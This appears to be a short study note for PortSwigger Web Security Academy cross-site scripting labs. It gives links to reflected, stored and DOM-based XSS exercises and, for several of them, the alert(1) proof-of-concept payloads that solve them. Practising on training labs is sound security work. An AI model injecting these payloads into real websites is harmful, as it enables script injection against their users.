Cross-Site Scripting (XSS)

PortSwigger

XSS Cheat Sheet https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

XSS Labs https://portswigger.net/web-security/all-labs#cross-site-scripting

Reflected XSS

Reflected XSS into HTML context with nothing encoded https://portswigger.net/web-security/cross-site-scripting/reflected/lab-html-context-nothing-encoded

<script>alert(1)</script>

Reflected XSS into attribute with angle brackets HTML-encoded https://portswigger.net/web-security/cross-site-scripting/contexts/lab-attribute-angle-brackets-html-encoded

"onmouseover="alert(1)

Stored XSS

Stored XSS into HTML context with nothing encoded https://portswigger.net/web-security/cross-site-scripting/stored/lab-html-context-nothing-encoded

<script>alert(1)</script>

DOM XSS

DOM XSS in document.write sink using source location.search https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sink

"><svg onload=alert(1)>

DOM XSS in innerHTML sink using source location.search https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-innerhtml-sink

DOM XSS in jQuery anchor href attribute sink using location.search source https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-jquery-href-attribute-sink

DOM XSS in jQuery selector sink using a hashchange event https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-jquery-selector-hash-change-event
